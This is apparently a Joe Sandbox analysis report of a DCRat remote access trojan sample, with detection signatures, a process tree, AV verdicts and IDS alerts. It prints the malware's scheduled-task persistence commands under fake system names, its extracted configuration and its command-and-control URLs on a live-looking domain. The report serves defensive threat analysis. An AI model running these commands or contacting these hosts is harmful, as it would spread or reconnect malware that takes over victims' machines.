Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N0tepkRPzw.exe

Overview

General Information

Sample name:N0tepkRPzw.exe
renamed because original name is a hash value
Original sample name:4b173aaa031de977353ca903f23520e4.exe
Analysis ID:1447088
MD5:4b173aaa031de977353ca903f23520e4
SHA1:56261520faf4c58a72be2edcff1c65a011896e16
SHA256:da46d37c422bf241bd3dabbc8846d9f94e3d2b7f3e80e17d70bcc6eb13161630
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • N0tepkRPzw.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\N0tepkRPzw.exe" MD5: 4B173AAA031DE977353CA903F23520E4)
    • wscript.exe (PID: 7296 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • blockServerruntime.exe (PID: 7436 cmdline: "C:\bridgeportserver\blockServerruntime.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)
          • schtasks.exe (PID: 7516 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7548 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7564 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7580 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7596 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7656 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7688 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7716 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7752 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7768 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7784 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7888 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7944 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • qVUjshNEHYUOCXyHyUMQwFlZoe.exe (PID: 7604 cmdline: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)
  • qVUjshNEHYUOCXyHyUMQwFlZoe.exe (PID: 7628 cmdline: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)
  • cleanup
{"SCRT": "{\"E\":\"~\",\"J\":\"@\",\"h\":\"%\",\"j\":\"#\",\"1\":\"(\",\"l\":\"&\",\"S\":\"$\",\"3\":\"!\",\"M\":\"<\",\"8\":\";\",\"o\":\"-\",\"c\":\")\",\"Z\":\"`\",\"4\":\"_\",\"y\":\"^\",\"5\":\"*\",\"d\":\">\",\"6\":\"|\",\"B\":\".\",\"H\":\",\",\"p\":\" \"}", "PCRT": "{\"B\":\" \",\"V\":\"|\",\"F\":\")\",\"Q\":\"<\",\"l\":\"`\",\"M\":\"!\",\"W\":\">\",\"k\":\";\",\"c\":\"-\",\"w\":\"@\",\"S\":\"%\",\"U\":\"^\",\"d\":\"_\",\"m\":\"$\",\"D\":\"*\",\"X\":\"&\",\"R\":\".\",\"v\":\"#\",\"j\":\"(\",\"N\":\"~\",\"K\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-84cmi9yxIS6Lop3CzZmk", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "H2": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "T": "0"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
      00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
          0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
            Click to see the 15 entries

            System Summary

            barindex
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\bridgeportserver\blockServerruntime.exe, ProcessId: 7436, TargetFilename: C:\Windows\addins\RuntimeBroker.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\N0tepkRPzw.exe", ParentImage: C:\Users\user\Desktop\N0tepkRPzw.exe, ParentProcessId: 7252, ParentProcessName: N0tepkRPzw.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , ProcessId: 7296, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\bridgeportserver\blockServerruntime.exe", ParentImage: C:\bridgeportserver\blockServerruntime.exe, ParentProcessId: 7436, ParentProcessName: blockServerruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, ProcessId: 7752, ProcessName: schtasks.exe
            Timestamp:05/24/24-11:07:09.472406
            SID:2850862
            Source Port:80
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/24/24-11:08:12.793523
            SID:2850862
            Source Port:80
            Destination Port:49749
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: N0tepkRPzw.exeAvira: detected
            Source: http://a0985701.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6Avira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3WAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3WAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/@=AzYyIGNycDOAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3WAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3WAvira URL Cloud: Label: malware
            Source: http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLAvira URL Cloud: Label: malware
            Source: C:\bridgeportserver\u0vIoi.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\bridgeportserver\blockServerruntime.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\addins\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
